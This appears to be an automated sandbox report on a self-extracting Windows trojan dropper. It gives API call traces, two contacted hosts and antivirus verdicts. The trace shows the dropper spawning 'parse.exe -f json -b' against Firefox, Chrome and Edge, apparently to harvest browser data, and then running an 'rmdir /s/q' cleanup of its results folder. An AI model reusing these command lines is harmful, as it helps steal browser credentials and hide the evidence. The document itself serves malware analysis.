section {u'size_of_data': u'0x0000d600', u'virtual_address': u'0x00063000', u'entropy': 6.855402526678264, u'name': u'.rsrc', u'virtual_size': u'0x0000d470'} entropy 6.85540252668 description A section with a high entropy has been found
host 172.217.25.14
host 35.220.235.49
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

ordinal: 0
function_address: 0x000007feff017a50
function_name: wine_get_version
module: ntdll
module_address: 0x00000000771c0000
-1073741511 0

LdrGetProcedureAddress

ordinal: 0
function_address: 0x000007feff017a50
function_name: wine_get_version
module: ntdll
module_address: 0x00000000771c0000
-1073741511 0

LdrGetProcedureAddress

ordinal: 0
function_address: 0x000007feff017a50
function_name: wine_get_version
module: ntdll
module_address: 0x00000000771c0000
-1073741511 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 3236
1 0 0

CreateProcessInternalW

thread_identifier: 8232
thread_handle: 0x000002dc
process_identifier: 4232
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002d4
1 1 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 8796092887632
registers.r15: 48
registers.rcx: 6629298656858961778
registers.rsi: 5369553405
registers.r10: 5368709159
registers.rbx: 5369554524
registers.rsp: 5369553790
registers.r11: 5369776951
registers.r8: 1070656059720
registers.r9: 5369712797
registers.rip: 64530
registers.rdx: 5369553868
registers.r12: 519
registers.rbp: 1026935958146
registers.rdi: 5369553184
registers.rax: 5369591581
registers.r13: -1320563801
thread_handle: 0xfffffffffffffffe
process_identifier: 4232
1 0 0

NtResumeThread

thread_handle: 0x0000000000000064
suspend_count: 0
process_identifier: 4232
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 0
registers.r11: 0
registers.r8: 51
registers.r9: 2199026073600
registers.rip: 0
registers.rdx: 0
registers.r12: 0
registers.rbp: 0
registers.rdi: 34634617323547
registers.rax: 0
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 4232
1 0 0

NtResumeThread

thread_handle: 0x0000000000000104
suspend_count: 0
process_identifier: 4232
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

CreateProcessInternalW

thread_identifier: 5640
thread_handle: 0x0000000000000068
process_identifier: 3660
current_directory:
filepath:
track: 1
command_line: parse.exe -f json -b firefox
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000000000000074
1 1 0

CreateProcessInternalW

thread_identifier: 7236
thread_handle: 0x0000000000000068
process_identifier: 2848
current_directory:
filepath:
track: 1
command_line: parse.exe -f json -b chrome
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000000000000074
1 1 0

CreateProcessInternalW

thread_identifier: 7940
thread_handle: 0x0000000000000068
process_identifier: 4792
current_directory:
filepath:
track: 1
command_line: parse.exe -f json -b edge
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000000000000074
1 1 0

NtResumeThread

thread_handle: 0x0000000000000068
suspend_count: 0
process_identifier: 4232
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x0000000000000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: rmdir /s/q C:\Users\test22\AppData\Local\Temp\RarSFX0\results
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000000000000000
0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 15597568
registers.r15: 2291392
registers.rcx: 1394708509601300480
registers.rsi: 1365938799961
registers.r10: 8623489024
registers.rbx: 58111
registers.rsp: 19924325
registers.r11: 20457326
registers.r8: 29611918
registers.r9: 627689198084866744
registers.rip: 0
registers.rdx: -1203587000414764752
registers.r12: 514
registers.rbp: 515
registers.rdi: 19923196
registers.rax: 334278999146800
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 3660
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 3660
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 0
registers.r11: 0
registers.r8: 51
registers.r9: 2199026073600
registers.rip: 0
registers.rdx: 0
registers.r12: 0
registers.rbp: 0
registers.rdi: 34634617323547
registers.rax: 0
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 3660
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b4
suspend_count: 1
process_identifier: 3660
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b8
suspend_count: 1
process_identifier: 3660
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 3660
1 0 0

NtResumeThread

thread_handle: 0x00000000000000e8
suspend_count: 1
process_identifier: 3660
1 0 0

NtGetContextThread

thread_handle: 0x0000000000000118
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 1
process_identifier: 3660
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 15597568
registers.r15: 2291392
registers.rcx: 1394708509601300480
registers.rsi: 1365938799961
registers.r10: 8623489024
registers.rbx: 58111
registers.rsp: 19924325
registers.r11: 20457326
registers.r8: 29611918
registers.r9: 627689198084866744
registers.rip: 0
registers.rdx: -1203587000414764752
registers.r12: 514
registers.rbp: 515
registers.rdi: 19923196
registers.rax: 334278999146800
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 2848
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 0
registers.r11: 0
registers.r8: 51
registers.r9: 2199026073600
registers.rip: 0
registers.rdx: 0
registers.r12: 0
registers.rbp: 0
registers.rdi: 34634617323547
registers.rax: 0
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b4
suspend_count: 1
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b8
suspend_count: 1
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x00000000000000e8
suspend_count: 1
process_identifier: 2848
1 0 0

NtGetContextThread

thread_handle: 0x000000000000016c
1 0 0

NtResumeThread

thread_handle: 0x000000000000016c
suspend_count: 1
process_identifier: 2848
1 0 0

NtResumeThread

thread_handle: 0x000000000000016c
suspend_count: 0
process_identifier: 2848
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtGetContextThread

thread_handle: 0x0000000000000174
1 0 0

NtResumeThread

thread_handle: 0x0000000000000174
suspend_count: 1
process_identifier: 2848
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 15597568
registers.r15: 2291392
registers.rcx: 1394708509601300480
registers.rsi: 1365938799961
registers.r10: 8623489024
registers.rbx: 58111
registers.rsp: 19924325
registers.r11: 20457326
registers.r8: 29611918
registers.r9: 627689198084866744
registers.rip: 0
registers.rdx: -1203587000414764752
registers.r12: 514
registers.rbp: 515
registers.rdi: 19923196
registers.rax: 334278999146800
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 4792
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 4792
1 0 0

NtGetContextThread

thread_handle: 0xfffffffffffffffe
1 0 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 0
registers.r11: 0
registers.r8: 51
registers.r9: 2199026073600
registers.rip: 0
registers.rdx: 0
registers.r12: 0
registers.rbp: 0
registers.rdi: 34634617323547
registers.rax: 0
registers.r13: 0
thread_handle: 0xfffffffffffffffe
process_identifier: 4792
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b4
suspend_count: 1
process_identifier: 4792
1 0 0

NtResumeThread

thread_handle: 0x00000000000000b8
suspend_count: 1
process_identifier: 4792
1 0 0

NtResumeThread

thread_handle: 0x00000000000000bc
suspend_count: 1
process_identifier: 4792
1 0 0

NtResumeThread

thread_handle: 0x00000000000000dc
suspend_count: 1
process_identifier: 4792
1 0 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
DrWeb Trojan.BPlug.3891
MicroWorld-eScan Trojan.Rasftuby.Gen.14
ALYac Trojan.Rasftuby.Gen.14
Cylance Unsafe
Zillya Trojan.ScriptKD.JS.10
Sangfor Trojan.Win32.Wacatac.B
K7AntiVirus Riskware ( 0040eff71 )
Alibaba TrojanDropper:Win64/DropperX.52335e60
K7GW Riskware ( 0040eff71 )
Cybereason malicious.4f95c4
Arcabit Trojan.Rasftuby.Gen.14
Cyren W64/Trojan.FTSR-8271
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Win64:DropperX-gen [Drp]
ClamAV Win.Malware.Rasftuby-9828908-0
BitDefender Trojan.Rasftuby.Gen.14
Paloalto generic.ml
Ad-Aware Trojan.Rasftuby.Gen.14
Sophos ML/PE-A
McAfee-GW-Edition BehavesLike.Win32.GenericRX.vc
FireEye Generic.mg.71832d24f95c424d
Emsisoft Trojan.Rasftuby.Gen.14 (B)
SentinelOne Static AI - Suspicious SFX
eGambit Unsafe.AI_Score_91%
Avira HEUR/AGEN.1113311
MAX malware (ai score=100)
Gridinsoft Trojan.Win32.Agent.ns
Microsoft Trojan:Win32/Tiggre!rfn
AegisLab Trojan.Win32.Rasftuby.4!c
GData Trojan.Rasftuby.Gen.14
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.RL_Generic.R360804
McAfee Artemis!71832D24F95C
Malwarebytes Trojan.BrowserModifier.SFX
TrendMicro-HouseCall TROJ_GEN.R002H09DK21
Ikarus PUA.NoobyProtect
Fortinet Riskware/Application
AVG Win64:DropperX-gen [Drp]
CrowdStrike win/malicious_confidence_70% (W)